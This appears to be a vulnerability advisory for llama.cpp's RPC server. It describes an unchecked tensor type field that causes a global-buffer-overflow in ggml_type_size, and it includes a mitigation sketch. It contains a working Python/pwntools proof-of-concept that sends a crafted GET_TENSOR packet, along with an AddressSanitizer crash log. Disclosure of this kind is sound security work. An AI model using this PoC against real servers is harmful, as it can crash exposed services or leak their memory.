global-buffer-overflow in ggml_type_size

Summary

The unvalidated type member of the rpc_tensor structure can cause a global-buffer-overflow.

Details

First, note that the type member of the rpc_tensor structure can be controlled by the user.

// ggml_tensor is serialized into rpc_tensor
#pragma pack(push, 1)
struct rpc_tensor {
    uint64_t id;
    uint32_t type;
    uint64_t buffer;
    uint32_t ne[GGML_MAX_DIMS];
    uint32_t nb[GGML_MAX_DIMS];
    uint32_t op;
    int32_t  op_params[GGML_MAX_OP_PARAMS / sizeof(int32_t)];
    int32_t  flags;
    uint64_t src[GGML_MAX_SRC];
    uint64_t view_src;
    uint64_t view_offs;
    uint64_t data;
    char name[GGML_MAX_NAME];

    char padding[4];
};
#pragma pack(pop)
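
To make the layout concrete, the following C sketch restates the structure and checks where type sits in the serialized bytes. The GGML_MAX_* values are assumptions inferred from the field counts used in the PoC (4 dimensions, 16 op_params words, 10 sources, a 64-byte name) and may differ in other versions. The two helper functions are hypothetical and not part of ggml.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Assumed constants, inferred from the PoC; not taken from ggml headers. */
#define GGML_MAX_DIMS       4
#define GGML_MAX_OP_PARAMS 64
#define GGML_MAX_SRC       10
#define GGML_MAX_NAME      64

#pragma pack(push, 1)
struct rpc_tensor {
    uint64_t id;
    uint32_t type;      /* attacker-controlled, later used as an array index */
    uint64_t buffer;
    uint32_t ne[GGML_MAX_DIMS];
    uint32_t nb[GGML_MAX_DIMS];
    uint32_t op;
    int32_t  op_params[GGML_MAX_OP_PARAMS / sizeof(int32_t)];
    int32_t  flags;
    uint64_t src[GGML_MAX_SRC];
    uint64_t view_src;
    uint64_t view_offs;
    uint64_t data;
    char name[GGML_MAX_NAME];

    char padding[4];
};
#pragma pack(pop)

/* Compile-time check that packing leaves no hidden padding between fields. */
static_assert(sizeof(struct rpc_tensor) == 296, "unexpected rpc_tensor size");

/* Hypothetical helper: byte offset of type within the serialized record. */
size_t rpc_tensor_type_offset(void) {
    return offsetof(struct rpc_tensor, type);
}

/* Hypothetical helper: total size of one serialized record. */
size_t rpc_tensor_wire_size(void) {
    return sizeof(struct rpc_tensor);
}
```

Under these assumptions, type occupies bytes 8 to 11 of a 296-byte record, so a client can set it to any 32-bit value.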

We can trigger a global-buffer-overflow during the following call by controlling the value of type.

The following is the function call chain that leads to global-buffer-overflow:

start_rpc_server
- rpc_serve_client
  - rpc_server::get_tensor
    - rpc_server::deserialize_tensor
      - ggml_new_tensor_4d
        - ggml_new_tensor
          - ggml_row_size
            - ggml_type_size

GGML_CALL size_t ggml_type_size(enum ggml_type type) {
    return type_traits[type].type_size; // type is used as an array index without being validated or sanitized
}
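
One possible mitigation is to reject out-of-range values before they are used as an index. The sketch below illustrates the idea on a hypothetical two-entry table. The names demo_type, demo_traits and demo_type_size_checked are illustrative and not ggml APIs, and this is not necessarily how the issue was fixed upstream.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for the real type enum, which has many more entries. */
enum demo_type { DEMO_TYPE_F32, DEMO_TYPE_F16, DEMO_TYPE_COUNT };

struct demo_type_traits {
    const char *name;
    size_t      type_size;
};

/* Hypothetical stand-in for the global traits table indexed by type. */
static const struct demo_type_traits demo_traits[DEMO_TYPE_COUNT] = {
    { "f32", 4 },
    { "f16", 2 },
};

/*
 * Returns 1 and stores the element size in *out_size when raw_type is a
 * valid table index. Returns 0 and leaves *out_size untouched otherwise,
 * so the table is never read out of bounds.
 */
int demo_type_size_checked(uint32_t raw_type, size_t *out_size) {
    if (raw_type >= (uint32_t) DEMO_TYPE_COUNT) {
        return 0;
    }
    *out_size = demo_traits[raw_type].type_size;
    return 1;
}
```

With such a check in the deserialization path, the value 0x100 used in the PoC would be rejected instead of reaching the table lookup.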

PoC

Build

git clone https://github.com/ggerganov/llama.cpp.git && cd llama.cpp && mkdir build-rpc && cd build-rpc && cmake .. -DGGML_RPC=ON && cmake --build . --config Release
pip install pwntools

Reproduce

In llama.cpp/build-rpc/bin, run this command:

./rpc-server -p 50052

Then run the following Python script, which sets type to 0x100.

from pwn import *

ALLOC_BUFFER = 0
GET_ALIGNMENT = 1
GET_MAX_SIZE = 2
BUFFER_GET_BASE = 3
FREE_BUFFER = 4
BUFFER_CLEAR = 5
SET_TENSOR = 6
GET_TENSOR = 7
COPY_TENSOR = 8
GRAPH_COMPUTE = 9
GET_DEVICE_MEMORY = 10

context(arch='amd64',log_level = 'debug')

p = remote("127.0.0.1",50052)
pd = b''
rpc_tensor_pd = flat(
    {
        0: [
            0x1,  # id
            p32(0x100),  # type
            p64(0xdeadbeef),  # buffer
            [  # ne
                p32(0xdeadbeef),
                p32(0xdeadbeef),
                p32(0xdeadbeef),
                p32(0xdeadbeef),
            ],
            [  # nb
                p32(1),
                p32(1),
                p32(1),
                p32(1),
            ],
            p32(0),  # op
            [p32(0)] * 16,  # op_params (16 x int32)
            p32(0),  # flags
            [p64(0)] * 10,  # src
            p64(0),  # view_src
            p64(0),  # view_offs
            p64(0xdeadbeef),  # data
            b'a' * 64,  # name
            b'x' * 4  # padding
        ],
    }
)
cmd = p8(GET_TENSOR)
content = flat(
    {
        0: rpc_tensor_pd + p64(0) + p64(0x100)
    }
)
input_size = p64(len(content))
pd+= cmd + input_size + content

p.send(pd)
p.recvall(timeout=1)

p.close()

This triggers a global-buffer-overflow in the server.

Asan log

➜  bin git:(master) ✗ ./rpc-server -p 50052
create_backend: using CPU backend
Starting RPC server on 0.0.0.0:50052, backend memory: 7896 MB
Accepted client connection, free_mem=8280244224, total_mem=8280244224
=================================================================
==14276==ERROR: AddressSanitizer: global-buffer-overflow on address 0x738b419e94d8 at pc 0x738b4183cad9 bp 0x7fffe4a5ac50 sp 0x7fffe4a5ac40
READ of size 8 at 0x738b419e94d8 thread T0
    #0 0x738b4183cad8 in ggml_type_size (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x3cad8)
    #1 0x738b418467b5 in ggml_row_size (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x467b5)
    #2 0x738b41863fdd in ggml_new_tensor (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x63fdd)
    #3 0x738b41864a2b in ggml_new_tensor_4d (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x64a2b)
    #4 0x738b41944ee6 in rpc_server::deserialize_tensor(ggml_context*, rpc_tensor const*) (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x144ee6)
    #5 0x738b41949f1f in rpc_server::get_tensor(std::vector<unsigned char, std::allocator<unsigned char> > const&, std::vector<unsigned char, std::allocator<unsigned char> >&) (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x149f1f)
    #6 0x738b41957642 in start_rpc_server (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x157642)
    #7 0x5c8d5aeeec63 in main (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/bin/rpc-server+0x2c63)
    #8 0x738b41029d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #9 0x738b41029e3f in __libc_start_main_impl ../csu/libc-start.c:392
    #10 0x5c8d5aeeeff4 in _start (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/bin/rpc-server+0x2ff4)

Address 0x738b419e94d8 is a wild pointer.
SUMMARY: AddressSanitizer: global-buffer-overflow (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x3cad8) in ggml_type_size
Shadow bytes around the buggy address:
  0x0e71e8335240: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x0e71e8335250: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x0e71e8335260: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x0e71e8335270: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x0e71e8335280: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
=>0x0e71e8335290: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9[f9]f9 f9 f9 f9
  0x0e71e83352a0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x0e71e83352b0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x0e71e83352c0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x0e71e83352d0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x0e71e83352e0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==14276==ABORTING

Impact

This vulnerability is an out-of-bounds read of global memory and may lead to leakage of memory contents.

Credit

This vulnerability was discovered by 7resp4ss and Guang Gong from 360 Vulnerability Research Institute.
